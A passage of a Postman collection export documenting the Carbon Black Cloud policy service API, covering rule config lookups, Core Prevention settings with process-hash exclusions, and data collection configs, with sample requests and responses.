[\n                    {\n                        \"platform\": \"WINDOWS\",\n                        \"header\": \"cred_theft.windows.heading\",\n                        \"subHeader\": [\n                            \"cred_theft.windows.sub_heading\"\n                        ],\n                        \"actions\": [\n                            {\n                                \"component\": \"assignment-mode-selector\",\n                                \"parameter\": \"WindowsAssignmentMode\"\n                            }\n                        ]\n                    }\n                ]\n            },\n            \"parameters\": [\n                {\n                    \"default\": \"BLOCK\",\n                    \"name\": \"WindowsAssignmentMode\",\n                    \"description\": \"Used to change assignment mode to PREVENT or BLOCK\",\n                    \"recommended\": \"BLOCK\",\n                    \"validations\": [\n                        {\n                            \"type\": \"enum\",\n                            \"values\": [\n                                \"REPORT\",\n                                \"BLOCK\"\n                            ]\n                        }\n                    ]\n                }\n            ]\n        }\n        ... Truncated ...\n    ]\n}"}],"_postman_id":"8ecf4785-88fb-491a-9053-76d26cd7b91b"},{"name":"Parameter Schema","id":"6688993f-f8e6-4c21-9963-27481adc00d4","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/rule_configs/{{cb_rule_config_id}}/parameters/schema","description":"<p>Fetch the schema definition for the dynamic parameters for a rule config.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","rule_configs","{{cb_rule_config_id}}","parameters","schema"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"15ffa35c-7cfb-4e92-81b9-5fddbfee52e8","name":"Parameter Schema","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/rule_configs/{{cb_rule_config_id}}/parameters/schema"},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"type\": \"object\",\n    \"properties\": {\n        \"WindowsAssignmentMode\": {\n            \"default\": \"BLOCK\",\n            \"description\": \"Used to change assignment mode to PREVENT or BLOCK\",\n            \"type\": \"string\",\n            \"enum\": [\n                \"REPORT\",\n                \"BLOCK\"\n            ]\n        }\n    }\n}"}],"_postman_id":"6688993f-f8e6-4c21-9963-27481adc00d4"},{"name":"Lookup","id":"278ea144-1e70-4dff-8801-ac27539eea3a","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/rules/{{cb_rule_id}}","description":"<p>Fetch the rule config configuration from a triggered alert.</p>\n<p><em><strong>Note:</strong></em> <em>The Alerts V6 API provides the</em> <em><code>rule_id</code></em> <em>and</em> <em><code>rule_category_id</code></em> <em>in the</em> <em><code>reason_code</code></em> <em>with the format</em> <em><code>\"reason_code\": \"rule_category_id:rule_id\"</code></em> <em>e.g.</em> <em><code>reason_code:\"78F50A65-EC30-4A20-8328-A523BDA82217:8E54DD2E-6857-442A-898D-62603286095C\"</code></em></p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","rules","{{cb_rule_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"d4bf7b73-cb32-4062-94ab-36614f5c18fc","name":"Lookup","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/rules/{{cb_rule_id}}"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": \"2aaae8b8-469c-4658-b576-0d4001974073\",\n    \"name\": \"Block google ping\",\n    \"properties\": {\n        \"action\": \"BLOCK_ALERT\",\n        \"application_path\": \"*\",\n        \"direction\": \"IN\",\n        \"enabled\": true,\n        \"local_ip_address\": \"*\",\n        \"local_port_ranges\": \"*\",\n        \"name\": \"ICMP_Outbound\",\n        \"protocol\": \"ICMP\",\n        \"remote_ip_address\": \"*\",\n        \"remote_port_ranges\": \"*\",\n        \"rule_access_check_guid\": \"e8220ab3-f27f-4ffb-8000-fe02e261a211\",\n        \"rule_inbound_event_check_guid\": \"2aaae8b8-469c-4658-b576-0d4001974073\",\n        \"rule_outbound_event_check_guid\": \"c9dc86c3-2571-4009-bd83-4fe8bf6097b1\",\n        \"rule_group_name\": \"Block google ping\",\n        \"test_mode\": false\n    },\n    \"test_mode\": false,\n    \"rule_config_id\": \"df181779-f623-415d-879e-91c40246535d\",\n    \"rule_config_version\": 21,\n    \"rule_config_category\": \"host_based_firewall\",\n    \"is_archived\": false\n}"}],"_postman_id":"278ea144-1e70-4dff-8801-ac27539eea3a"}],"id":"defdd485-ec4b-4f1d-b75b-2a1d8b47ba75","description":"<p>A Rule Config is a new type of setting within policy that allows users to make adjustments to Carbon Black-defined rules. It will be more common to use a specialisation such as Rule Config - Core Prevention or Rule Config - Host Based Firewall, rather than the generic API calls.</p>\n","_postman_id":"defdd485-ec4b-4f1d-b75b-2a1d8b47ba75","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Rule Config - Core Prevention","item":[{"name":"Get Core Prevention Rule Configs","id":"dafe6ee0-2ed5-43c6-aae0-869718f93af1","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/core_prevention","description":"<p>Fetch configured Core Prevention rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","core_prevention"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"4b031e27-b653-4e1f-ac63-79772210010b","name":"Get Core Prevention Rule Configs","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/core_prevention"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n  \"results\": [\n    {\n      \"id\": \"97a03cc2-5796-4864-b16d-790d06bea20d\",\n      \"name\": \"Defense Evasion\",\n      \"description\": \"Addresses common TTPs/behaviors that threat actors use to avoid detection such as uninstalling or disabling security software, obfuscating or encrypting data/scripts and abusing trusted processes to hide and disguise their malicious activity.\",\n      \"inherited_from\": \"psc:region\",\n      \"category\": \"core_prevention\",\n      \"parameters\": {\n        \"WindowsAssignmentMode\": \"BLOCK\"\n      }\n    },\n    {\n      \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n      \"name\": \"Persistence\",\n      \"description\": \"Addresses common TTPs/behaviors that threat actors use to retain access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\",\n      \"inherited_from\": \"psc:region\",\n      \"category\": \"core_prevention\",\n      \"parameters\": {\n        \"WindowsAssignmentMode\": \"BLOCK\"\n      },\n      \"exclusions\": {\n        \"windows\": [\n          {\n            \"id\": 2441,\n            \"criteria\": [\n              {\n                \"id\": 2648,\n                \"type\": \"initiator_process\",\n                \"attributes\": [\n                  {\n                    \"id\": 16817,\n                    \"name\": \"process_sha256\",\n                    \"values\": [\n                      \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                    ]\n                  }\n                ]\n              }\n            ],\n            \"comments\": \"\",\n            \"created_by\": \"tester@carbonblack.com\",\n            \"created_at\": \"2023-08-31T14:02:47.530Z\",\n            \"modified_by\": \"tester@carbonblack.com\",\n            \"modified_at\": \"2023-08-31T14:02:47.530Z\"\n          }\n        ]\n      }\n    }\n  ]\n}"}],"_postman_id":"dafe6ee0-2ed5-43c6-aae0-869718f93af1"},{"name":"Update Core Prevention Rule Configs","id":"eca8e992-ad1d-4ecc-9082-de20ccea6d36","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"<string>\",\n        \"parameters\": {\n            \"WindowsAssignmentMode\": \"<string>\"\n        },\n        \"exclusions\": {\n            \"windows\": [\n                {\n                    \"id\": <integer>,\n                    \"criteria\": [\n                        {\n                            \"id\": <integer>,\n                            \"type\": \"<string>\",\n                            \"attributes\": [\n                                {\n                                    \"id\": <integer>,\n                                    \"name\": \"<string>\",\n                                    \"values\": [\n                                        \"<string>\"\n                                    ]\n                                }\n                            ]\n                        }\n                    ],\n                    \"comments\": \"<string>\",\n                    \"created_by\": \"<string>\",\n                    \"created_at\": \"<string>\",\n                    \"modified_by\": \"<string>\",\n                    \"modified_at\": \"<string>\"\n                }\n            ]\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/core_prevention","description":"<p>Update parameters for core prevention rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","core_prevention"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"f6400215-2644-4e8c-a514-7bb27a01953b","name":"Update Core Prevention Rule Configs","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n        \"parameters\": {\n            \"WindowsAssignmentMode\": \"BLOCK\"\n        },\n        \"exclusions\": {\n            \"windows\": [\n                {\n                    \"id\": 2441,\n                    \"criteria\": [\n                        {\n                            \"id\": 2648,\n                            \"type\": \"initiator_process\",\n                            \"attributes\": [\n                                {\n                                    \"id\": 16815,\n                                    \"name\": \"process_sha256\",\n                                    \"values\": [\n                                        \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                                    ]\n                                }\n                            ]\n                        }\n                    ],\n                    \"comments\": \"\",\n                    \"created_by\": \"tester@carbonblack.com\",\n                    \"created_at\": \"2023-08-31T14:02:47.530Z\",\n                    \"modified_by\": \"tester@carbonblack.com\",\n                    \"modified_at\": \"2023-08-31T14:02:47.530Z\"\n                },\n                {\n                    \"id\": 2442,\n                    \"criteria\": [\n                        {\n                            \"id\": 2649,\n                            \"type\": \"initiator_process\",\n                            \"attributes\": [\n                                {\n                                    \"id\": 16816,\n                                    \"name\": \"process_sha256\",\n                                    \"values\": [\n                                        \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                                    ]\n                                }\n                            ]\n                        }\n                    ],\n                    \"comments\": \"Test Exclusion\",\n                    \"created_by\": \"tester@carbonblack.com\",\n                    \"created_at\": \"2023-09-01T07:25:33.558Z\",\n                    \"modified_by\": \"tester@carbonblack.com\",\n                    \"modified_at\": \"2023-09-01T07:25:33.558Z\"\n                },\n                {\n                    \"criteria\": [\n                        {\n                            \"type\": \"initiator_process\",\n                            \"attributes\": [\n                                {\n                                    \"name\": \"process_sha256\",\n                                    \"values\": [\n                                        \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                                    ]\n                                }\n                            ]\n                        }\n                    ],\n                    \"comments\": \"test exclusion\"\n                }\n            ]\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/core_prevention"},"_postman_previewlanguage":"json","header":[{"key":"Content-Type","value":"application/json","description":""}],"cookie":[],"responseTime":null,"body":"{\n    \"successful\": [\n        {\n            \"id\": \"8a16234c-9848-473a-a803-f0f0ffaf5f29\",\n            \"name\": \"Persistence\",\n            \"description\": \"Addresses common TTPs/behaviors that threat actors use to retain access to systems across restarts, changed credentials, and other interruptions that could cut off their access.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"core_prevention\",\n            \"parameters\": {\n                \"WindowsAssignmentMode\": \"BLOCK\"\n            },\n            \"exclusions\": {\n                \"windows\": [\n                    {\n                        \"id\": 2441,\n                        \"criteria\": [\n                            {\n                                \"id\": 2648,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 16817,\n                                        \"name\": \"process_sha256\",\n                                        \"values\": [\n                                            \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"\",\n                        \"created_by\": \"tester@carbonblack.com\",\n                        \"created_at\": \"2023-08-31T14:02:47.530Z\",\n                        \"modified_by\": \"tester@carbonblack.com\",\n                        \"modified_at\": \"2023-08-31T14:02:47.530Z\"\n                    },\n                    {\n                        \"id\": 2442,\n                        \"criteria\": [\n                            {\n                                \"id\": 2649,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 16818,\n                                        \"name\": \"process_sha256\",\n                                        \"values\": [\n                                            \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"Test Exclusion\",\n                        \"created_by\": \"tester@carbonblack.com\",\n                        \"created_at\": \"2023-09-01T07:25:33.558Z\",\n                        \"modified_by\": \"tester@carbonblack.com\",\n                        \"modified_at\": \"2023-09-01T07:25:33.558Z\"\n                    },\n                    {\n                        \"id\": 2443,\n                        \"criteria\": [\n                            {\n                                \"id\": 2650,\n                                \"type\": \"initiator_process\",\n                                \"attributes\": [\n                                    {\n                                        \"id\": 16819,\n                                        \"name\": \"process_sha256\",\n                                        \"values\": [\n                                            \"03feb86ee497e5430c99607a746dc28dc46a3e9be46311dc8f29ef195d93060a\"\n                                        ]\n                                    }\n                                ]\n                            }\n                        ],\n                        \"comments\": \"test exclusion\",\n                        \"created_by\": \"tester@carbonblack.com\",\n                        \"created_at\": \"2023-09-01T07:26:14.354Z\",\n                        \"modified_by\": \"tester@carbonblack.com\",\n                        \"modified_at\": \"2023-09-01T07:26:14.354Z\"\n                    }\n                ]\n            }\n        }\n    ],\n    \"failed\": []\n}"}],"_postman_id":"eca8e992-ad1d-4ecc-9082-de20ccea6d36"},{"name":"Delete Specific Core Prevention Rule Config","id":"faf9405d-c3af-4f36-8a60-1354ead90974","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/core_prevention/{{cb_rule_config_id}}","description":"<p>Reset a specific core prevention rule config to TAU recommended default BLOCK.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","core_prevention","{{cb_rule_config_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"faf9405d-c3af-4f36-8a60-1354ead90974"}],"id":"72e82d67-6446-4d00-8ef6-a63549764eeb","description":"<p>The Carbon Black Threat Analysis Unit (<code>TAU</code>) publishes high-fidelity prevention rules called <code>Core Prevention</code> to <code>3.6+ Windows</code> sensors. These rules protect customers from a variety of different types of late-breaking, high-impact attacks without the need for customers to change policy configurations.</p>\n<p>Despite the high-fidelity and low false positive rate of these preventions, we recognize customers sometimes have business-critical assets that perform certain behaviors and trigger false positives. Core Prevention controls provide customers with configuration options to set TAU-published prevention categories to <code>Alert Only</code> if necessary within their policies. Core Prevention Rule Configs have the option of <code>Alert Only</code> and <code>Alert and Block</code>.</p>\n","_postman_id":"72e82d67-6446-4d00-8ef6-a63549764eeb","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Rule Config - Data Collection","item":[{"name":"Get Data Collection Rule Configs - Organization","id":"d34b4a1c-814e-456a-b9df-1cd0b3027533","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/rule_configs/data_collection","description":"<p>Fetch configured Core Prevention rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","rule_configs","data_collection"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"fbbbb402-da17-4653-ac06-d5dae2cc79b2","name":"Get Data Collection Rule Configs - Organization","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/rule_configs/data_collection"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"name\": \"Authentication Events\",\n            \"description\": \"Turns on Windows authentication events at the sensor\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_auth_events\": false\n            }\n        },\n        {\n            \"id\": \"d67f36ca-97c2-11ed-a8fc-0242ac120002\",\n            \"name\": \"Enterprise EDR Event Collection\",\n            \"description\": \"Enterprise EDR Event Collection\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"ubs_opt_in\": true\n            }\n        },\n        {\n            \"id\": \"cc075469-8d1e-4056-84b6-0e6f437c4010\",\n            \"name\": \"XDR\",\n            \"description\": \"Turns on XDR network data collection at the sensor\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"ids_approved_list\": [\n                    {\n                        \"ip_address\": \"10.203.46.123\",\n                        \"note\": \"sample note\"\n                    },\n                    {\n                        \"ip_address\": \"2001:db8:3333:4444:5555:6666:7777:8888\"\n                    }\n                ]\n            }\n        },\n        {\n            \"id\": \"491dd777-5a76-4f58-88bf-d29926d12778\",\n            \"name\": \"Prevalent Module Exclusions\",\n            \"description\": \"Collects events created when a process loads a common library. Enabling this will increase the number of events reported for expected process behavior.\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\",\n            \"parameters\": {\n                \"enable_prevalent_module_event_collection\": false\n            }\n        }\n    ]\n}"}],"_postman_id":"d34b4a1c-814e-456a-b9df-1cd0b3027533"},{"name":"Update Data Collection Rule Configs - Organization","id":"b39f2884-7bfa-4277-8087-15b7b4a02946","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"cc075469-8d1e-4056-84b6-0e6f437c4010\",\n        \"name\": \"XDR\",\n        \"parameters\": {\n            \"ids_approved_list\": [\n                {\n                    \"ip_address\": \"<string>\",\n                    \"note\": \"<string>\"\n                }\n            ]\n        }\n    },\n    {\n        \"id\": \"d67f36ca-97c2-11ed-a8fc-0242ac120002\",\n        \"name\": \"Enterprise EDR Event Collection\",\n        \"parameters\": {\n            \"ubs_opt_in\": <boolean>\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/rule_configs/data_collection","description":"<p>Update parameters for data collection rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>UPDATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","rule_configs","data_collection"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c8f5563e-5c0c-4838-87e2-42d4c6cd9670","name":"Update Data Collection Rule Configs - Organization","originalRequest":{"method":"PUT","header":[],"body":{"mode":"raw","raw":"[\n    {\n        \"id\": \"cc075469-8d1e-4056-84b6-0e6f437c4010\",\n        \"name\": \"XDR\",\n        \"parameters\": {\n            \"ids_approved_list\": [\n                {\n                    \"ip_address\": \"10.203.46.123\",\n                    \"note\": \"sample note\"\n                },\n                {\n                    \"ip_address\": \"2001:db8:3333:4444:5555:6666:7777:8888\"\n                }\n            ]\n        }\n    },\n    {\n        \"id\": \"d67f36ca-97c2-11ed-a8fc-0242ac120002\",\n        \"name\": \"Enterprise EDR Event Collection\",\n        \"parameters\": {\n            \"ubs_opt_in\": true\n        }\n    },\n    {\n        \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n        \"name\": \"Authentication Events\",\n        \"description\": \"Turns on Windows authentication events at the sensor\",\n        \"inherited_from\": \"\",\n        \"category\": \"data_collection\",\n        \"parameters\": {\n            \"enable_auth_events\": false\n        }\n    }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/rule_configs/data_collection"},"_postman_previewlanguage":null,"header":null,"cookie":[],"responseTime":null,"body":"{\n    \"successful\": [\n        {\n            \"id\": \"cc075469-8d1e-4056-84b6-0e6f437c4010\",\n            \"name\": \"XDR\",\n            \"description\": \"Turns on XDR network data collection at the sensor\",\n            \"inherited_from\": \"\",\n            \"category\": \"data_collection\"\n        },\n        {\n            \"id\": \"d67f36ca-97c2-11ed-a8fc-0242ac120002\",\n            \"name\": \"Enterprise EDR Event Collection\",\n            \"description\": \"Enterprise EDR Event Collection\",\n            \"inherited_from\": \"psc:region\",\n            \"category\": \"data_collection\"\n        }\n    ],\n    \"failed\": [\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"error_code\": \"BUNDLE_NOT_FOR_ORG_SCOPE\",\n            \"message\": \"Bundle 91c919da-fb90-4e63-9eac-506255b0a0d0 is not configurable at org scope\"\n        }\n    ]\n}"}],"_postman_id":"b39f2884-7bfa-4277-8087-15b7b4a02946"},{"name":"Get Data Collection Rule Configs","id":"61bab68d-f0a9-4c71-89bc-8b2be8a7f110","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/data_collection","description":"<p>Fetch configured Core Prevention rule configs.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.policies</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/policy-service/\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["policyservice","v1","orgs","{{cb_org_key}}","policies","{{cb_policy_id}}","rule_configs","data_collection"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"c95b645e-2087-4504-a208-7cead91aeaa5","name":"Get Data Collection Rule Configs","originalRequest":{"method":"GET","header":[],"url":"{{cb_url}}/policyservice/v1/orgs/{{cb_org_key}}/policies/{{cb_policy_id}}/rule_configs/data_collection"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"results\": [\n        {\n            \"id\": \"91c919da-fb90-4e63-9eac-506255b0a0d0\",\n            \"name\": \"Authentication Events\",\n            \"description\": \"Turns on Windows 